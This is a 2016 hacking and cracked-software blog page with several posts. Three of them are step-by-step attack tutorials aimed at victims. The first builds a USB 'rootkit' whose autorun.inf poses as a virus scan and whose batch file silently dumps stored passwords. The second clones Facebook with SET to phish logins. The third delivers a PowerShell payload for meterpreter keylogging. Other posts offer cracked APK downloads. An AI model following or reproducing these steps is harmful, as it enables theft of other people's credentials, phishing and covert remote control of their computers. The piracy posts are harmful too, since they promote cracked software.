Tuesday 31 May 2016

Hack Passwords Using Pendrive


We all know, Windows stores most of the passwords which are used on a daily basis, including instant messenger passwords such as MSN, Yahoo, AOL, Windows messenger etc. Along with these, Windows also stores passwords of Outlook Express, SMTP, POP, FTP accounts and auto-complete passwords of many browsers like IE and Firefox. There exists many tools for recovering these passswords from their stored places. Using these tools and a USB pen-drive, you can create your own rootkit to steal passwords from any computer. You need to follow these steps to make your own password stealing rootkits.

You must temporarily disable the antivirus before following these steps.

1.    Download the set of tools, extract them and copy all files (.exe) into your USB Pendrive.

Download Password Stealer From Here 
MessenPass
Mail PassView
IE Passview
Protected Storage PassVie
2.Create a new Notepad and write the following text into it.


[autorun] open=launch.bat
ACTION= Perform a Virus Scan


3.    Save the Notepad and rename it from New Text Document.txt to autorun.inf
4.    Copy the autorun.inf file onto your USB pen-drive.
5.    Create another Notepad and write the following text in it.


start mspass.exe /stext mspass.txtstart mailpv.exe /stext mailpv.txt
start iepv.exe /stext iepv.txt
start pspv.exe /stext pspv.txt
start passwordfox.exe /stext passwordfox.txt


Save the Notepad and rename it from New Text Document.txt to launch.bat. Copy the launch.bat file to your USB drive.

Now our rootkit is ready and we are all set to sniff the passwords. You can use this pen-drive on on any computer to steal the stored passwords.

Now, Insert the pen-drive and the auto-run window will pop-up. (This is because, we have created an auto-run pen-drive). In the pop-up window, select the first option (Perform a Virus Scan).  Now all the password recovery tools will silently get executed in the background (This process takes hardly a few seconds). The passwords get stored in the .TXT files. Remove the pen-drive and you’ll see the stored passwords in the .TXT files and Use The Passwords..

This Post Is Only For Educational Purpose... Please Do Not Misuse..

if you like our posts please like & share with your friends... 

& Don't Forget To....
Keep Visiting... Enjoy !!! :)

TalkEnglish Offline v2.0.7 APK+OBB [CRACKED]

Cover art

There are over 800 lessons and 8,000 audio files to help you learn how to speak English fluently. Most lessons contain clickable sentences that you can click to listen to a native English speaker say that sentence. Each lesson page also has a self record tool. You can record your own voice reading that sentence and compare it with the audio file from the native English speaker.

Features :
- All audio files work without Data or Wifi connection
- Click, listen, and repeat functionality
- Record and play back tool
- Interactive conversation practice lessons
- Hundreds of real life scenarios such as movies, sports, shopping, college life, pets, working, and many more.
- Book mark lessons / Manage favorite lessons feature
- Share feature
- Lesson Search
English categories consist of :
- English Basics
- Regular Daily English
- Business English
- Travel English
- Interview English
- Idioms and Phrases
- Listening Lessons
- Pronunciation Lessons
- English Grammar Basics
- Top 2000 English speaking Vocabulary word list
Due to the many audio files in this program, the file size is very large. Please verify you have access to Wifi in order to download this large file.
  TalkEnglish Offline- screenshot thumbnail      TalkEnglish Offline- screenshot thumbnail      TalkEnglish Offline- screenshot thumbnail
Download Links
Enjoy!!! :)

Saturday 28 May 2016

Hack A Facebook Account Using Kali-Linux (Credential Harvester Attack)


In our previews post we teach you how you can hack facebook password with one fake fb page (phishing). (Create A Facebook Phishing Page : CLICK HERE)

In this tutorial we will use Social Engineering tool i.e Credential Harvester Attack in kali linux.


All you need to do is follow the tutorial as it is to see the Credentials Harvester into the action.

WHAT IS CREDENTIALS HARVESTER ATTACK ?



It is a part of SOCIAL ENGINEERING TOOLKIT. In this method the attack started with a creation of phishing page. Attacker set the post back ip address to receive the credentials like usernames and passwords. The attacker can shorten the ip address to make the ip address looks like a genuine url. When the victim visits the url and feed the login details, the post back feature of the page will send all the data to attacker.

LET'S DO THIS !!!!!!!!!


STEPS:

1. Boot up kali linux on your machine and open terminal.

2. Type this command in the kali linux terminal.
                    
root@kali~# setoolkit

3. Enter 'y' to agree the social engineering toolkit terms and conditions.

4. Select the following options one by one from the menu

'1' (Social Engineering Attacks) then  
'2' (Website Attack Vectors) then
'3' (Credential Harvester Attack) then

5. Type '2' (Site Cloner)

set:webattack> IP address for the post back in 
harvesting:192.168.x.xxx (your ip address)

set:webattack>Enter the url to clone: www.facebook.com

6. Go to  Places > Computer > VAR > WWW and move all the files from www folder to html folder.

7.  Shorten your ip address with tinyurl.com and send it to the victim. When the victim open the link and enter the login details , you will get the username and password in a harvester text file which is located at Places > Computer > VAR > WWW. 

Done !!!

if you face any problem please Comment down below..

& if you like this post please LIKE & SHARE this with your friends

Hack Any PC Using Kali-Linux


Isn't it cool that you can control other's pc from your pc!!! Yes you can do it very easily. All you need is Kali linux in your PC..

In this tutorial you will learn HOW TO HACK ANY PC USING KALI LINUX. 
We are going to use SOCIAL ENGINEERING TOOLKIT for the hacking purpose. You may be curious about What the hell is social engineering toolkit? Let's first start with what is SET?

SOCIAL ENGINEERING TOOLKIT

SET is basically an open source python driven tool aimed at penetration testing around social engineering. It was created by the founder of TrustedSec. It is a menu driven based attack system, which makes the use of hacker tools easy. It is not made with command line interface because the social engineering attacks requires lot of customization according to the scenarios. Let's dive into the SET menu.

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) SMS Spoofing Attack Vector
   8) Wireless Access Point Attack Vector
   9) QRCode Generator Attack Vector
  10) Powershell Attack Vectors
  11) Third Party Modules
  99) Return back to the main menu  

It has got 12 options . And each option has got sub- divisions . We will not makes our hands dirty in all this .We will mainly focus on our main aim i.e hack any pc

So let's get started !!!!

Follow These Simple Steps :


1. Fire up Kali linux 2.0 / Kali linux 1.0 

2. Go to Applications>Exploitation Tools>Social Engineering Toolkit.

3. Select 1(Social Engineering Attacks) ==> 9(Powershell Attack Vectors ) ==> 1(Powershell Alphanumeric Shellcode Injectors).

4. Open a new terminal and type ifconfig .Copy and paste the ip address after LHOST : 192.XXX.X.XX and enter PORT:443






5. Do you want to start the listner now [yes/no] : yes . Copy the path as shown





6. Open a new terminal and Type the commands as shown


7. The file named as x86 powershellinjection.txt will be saved on your kali linux desktop rename it as "YOURNAME.bat ". Transfer it using pen drive or any cloud drive to victims pc.

8. When the victim press the .bat file on his pc , the payload handler will start .






9. msf exploit (handler) > sessions -i 1
    meterpreter>sysinfo
    meterpreter>keyscan_start (whatever the victim will type the keys will be recorded)

    meterpreter>keyscan_dump

     meterpreter>help (To get hacking/exploit commands list)

NOTE: This hacking only works when both the pc(your pc and victim's pc) is connected on the same network(LAN/WiFi). And we don't take any responsibility in case of breaking any legal laws. This tutorial is for educational purpose only.

If you like this tutorial please LIKE & SHARE this with your friends !!!! 

For any queries comment below..

Enjoy !!! :)

Tuesday 24 May 2016

How To Install Kali Linux on Android


Kali Linux is one the best love operating system of white hat hackers, security researchers and pentesters. It offers advanced penetration testing tool and its ease of use means that it should be a part of every security professional’s toolbox. While Kali linux is available for few devices only. However this does not mean you cannot installKali Linux in a chroot on almost any modern device that runs Android. In fact, the developers of Linux Deploy have made it extremely easy to get any number of Linux distributions installed in a chroot environment using a simple GUI builder. Let’s get started with installing Kali Linux On Any Android device.
Prerequisites
  • A device running Android 2.1 and above, rooted.
  • At least 5 GB free space on internal or external storage.
  • A fast, wireless internet connection.
  • Rooted Android Device: How to Root any Android device.
  • Patience.

Standard Packages of Kali Linux

Standard packages contains anything and everything I found useful. This list if divided into 3 parts:

Kali Specific

Kali Linux is a special build from Debian. Kali Linux inherits a lot of the issues from Debian Linux. This section shows you how to resolve of those. They are not specific to Kali Linux only and you might be leave them as it is, but I found that if I see an error my OCD kicks in and I have to make it go away…

Useful utilities and Software’s

A collection of utilities and software’s I found useful. These are day to day software’s that are available in most other Linux distributions or at least I think they should be made available as part of a default installation.

Enhancements and accessibility

Kali Linux is made to boot up fast and low of resources. But if you have some more CPU and GPU power to spare, you might want to try to make it look more colorful.

Install Kali Linux in any Android device

Step 1. First of all download and install Linux Deploy App in your android from the Google Play Store.
Step 2. Now After downloading and installing it launch the app in your device and there tap on download button.

Linux Deploy
Linux Deploy

Step 3. Now there tap on Distribution option and change it to Kali Linux instead of Linux. You’ve pretty much covered the important stuff. Optionally, you can choose your architecture, verify that the Kali mirror is correct, set your installation type and location on your Android device, etc. Generally speaking, the defaults provided by Linux Deploy are good to begin with.
Step 4. Now scroll up and click on the Install button at the top of there. Depending on your Internet connection speed, this process could take a while.
Step 5. Starting of services such as SSH and VNC for easier remote access. All of this is automatically done by hitting the “start” button. You should see Linux Deploy setting up your image with output similar to the following:

Linux Deploy
Linux Deploy

Now you can use either a SSH or VNC client to access your Kali instance.
Step 6. Now download and install VNC Viewer App in your android from the Play Store. 7. Now launch the app and fill up the settings as displayed on the screenshot below:

VNC-Viewer
VNC Viewer

Step 7. Now click on Connect button. That’s it, you are done. Now Kali linux gets installed in your android and you can enjoy the dummy hacking environment in your android.
Some devices reported strange error after Installing Kali Linux. If you faced any such error, it could be a ROM issue. Try with other device if you failed. Let us know if you faced any strange error whose solution you can’t find in Linux forums, we will try to provide you solution.

ApkTOOl for Android v6.0.6 Cracked APK

APK Tool

This project makes it possible to run apktool on android,in other words,you can decompile and recompile apk file without a computer,just with your android phone!

WHAT’S NEW :
  • Use Qt5.5 to rewrite all functions, support for the anti compile apk/jar, support for the conversion of ODEX Androidl.
  • Apdate apktool version AAPT, 2.0.3 version 5.0/5.1/6.0/6.1
  • New task management, any task can be terminated at any time.
  • Add text editor, (although the interface is ugly) easily edit large text
  • Add a search function, you can search for a string of folders to find the specified string contains all the files do not use root permissions to prevent small white error.
  • This update successfully turned to C++ by the Java, the latter is the common language in the next, with the feeling is not the same. Believe that the subsequent updates will be more awesome!
How To Install ?
  1. Uninstall any Previous Version of ApkTOOl for Android (Skip If Not Installed)
  2. Download and Install APK From The Links Given Below.
  3. Done..

Download Links :

Enjoy!!! 

How to Run Android 6.0 Marshmallow On PC Without Using Virtualbox


Hey, I got a surprise for the amazing Android users, now you can have Android 6.0 Marshmallow which is the latest version of Android devices and that is awesome. This time, you not only can use it into your smartphone but also you can have it on your PC, it’s unbelievable. You can really install Android marshmallow or any Android OS into your windows PC and use it just like you’d use it on your phone or tablet. Now here, I’ll show you guys how you can work on Android OS into your PC without using VirtualBox.

How To Run?

First Download Android Lollipop v5.0 ISO & Unet Bootin App from below. You Need Flash Drive With 2 GB Minimum Size

1. Plug Your Flash Drive To The PC.
2. Open Unet Bootin App The One You Downloaded.
3. Choose “Disk Image” Option To Select The “Android 6.0″ ISO File The One You Downloaded.
4. Select Your Flash Drive To Copy The Boot Files From The Android 6.0 ISO File & Then Click On “OK” & Now Unet Bootin Should CreateYour Bootable Flash Drive With Android 6.0 System On It.
5. Restart Your PC & Boot From Your Flash Drive As Shown In The Video.
6. Chose First Option To Run Android 6.0 As You Can See.
7. Next Screen may takes 10-20 minute to load. so be patient and wait.
8. After that, Marshmallow will start...
9.Same process to all Android OS.
10.ENJOY..

Screenshot

Download Link
            Unet Bootin App-Download
 Android 6.0 Marshmallow ISO-Download
   Android 5.0.2 Lollipop ISO-Download
           Other Android OS-Download

Friday 20 May 2016

Notifly Plus 1.03. Apk[LATEST][CRACKED]

 Notifly Plus
Sometimes you did not want to quit your current app but also need to quick reply to a message. At this point Notifly will help you.
By receiving a notification Notifly will open it’s content in a small bubble. By clicking this a bounded popup with the content will appear.
You can read it but also directly reply to it without quiting the current application. Currently Notifly supportsWhatsApp, Telegram, Line, Facebook Messenger, Google Messenger and Plus Messenger.
It is beautiful material designed to get best notification experiences.
Try Notifly now for yourself and report some Feedback.
Supported Apps
• WhatsApp
• Telegram
• Line
• Facebook Messenger
• Google Messenger
• Plus Messenger
In-App-Products
• Plus – Custom colors, bubble sizing and removes advertising
• Donates – Support this project with some small donations
Permissions
• Internet – used for advertisements
• Access network – used to receive advertisements
• System overlay – used for draw over apps
• Vibrate – used for vibrate at notification
• Billing – used for in app billing products
WHAT’S NEW
[release 1.0.3.RC1]
With this update we added support for following applications.
• Facebook Messenger
• Plus Messenger
• Line
Also sound and vibrate settings where builded in and of course some major bugfixes where done. Offset setting for bubble is now available.
How to Install?
  1. Download Apk (link below).
  2. On your Android device, go to settings > security > allow unknown sources.
  3. Find downloaded APK on your phone and install it.
  4. All Done. Enjoy!
Screenshots
Download Links

EagleGet Best Alternative for IDM [Internet Download Manager]

EagleGet
EagleGet is a universal download accelerator that supports HTTP, HTTPS, FTP, MMS and RTSP protocols. The application can also download video files from most popular online video websites. Helpfully, the developers have also created an extension for Google Chrome!
Features
  • Accelerate downloads by using multi-threaded technology.
  • Download files in Chrome, IE, Firefox and Opera with one click.
  • Support MMS, HTTP, HTTPS, FTP and RTSP protocols.
  • Download online videos from popular sites.
  • Built-in Media Grabber & Video Sniffer.
  • Built-in download scheduler for multiple queues.
  • Download different file types to separate folders.
  • Batch downloads function with clipboard capture.
  • Automatic refresh expired download address.
  • Support HTTP and SOCKET proxy.
  • Support fully customized User-Agent.
  • Monitor running and completed tasks with TaskMonitor.
  • Supports drag-and-drop to rearrange the priority of downloads.
  • Automatic run virus scan after download.
  • Automatic convert media format after download.
  • Convenient task properties panel.
  • Detailed connection log for each task.
  • Verify integrity of downloaded files.
  • Shutdown, hibernate or sleep computer after completing all transfers.
  • Built-in speed limiter.
  • Flexible notification configurations and Silent Mode (Game Mode) function.
  • Import download lists from other download managers.
  • Customizable user interface.
  • Supports multi-language interface (more than 30 languages).

Changelog

What’s new in v2.0.4.6 Stable
1. Fixed: Cannot download files through ALT+CTRL hotkey
2. Fixed: Cannot download files from some websites
3. Fixed: Incorrect file extensions while capturing downloads from some websites
4. Fixed: Cannot automatic install EagleGet Firefox plugin
5. Fixed: Instability problems related to clipboard
6. Added: The universal capture mode through win+insert hotkey
7. Fixed: Other minor problems.
How to Install?
  1.  Download the latest free setup of product
  2. Exit your browser
  3. Install setup file until finish
  4. Done and Enjoy! ðŸ˜€
Screenshots
Download Links
EagleGet v2.0.4.6 (5.7 MB) | Mirror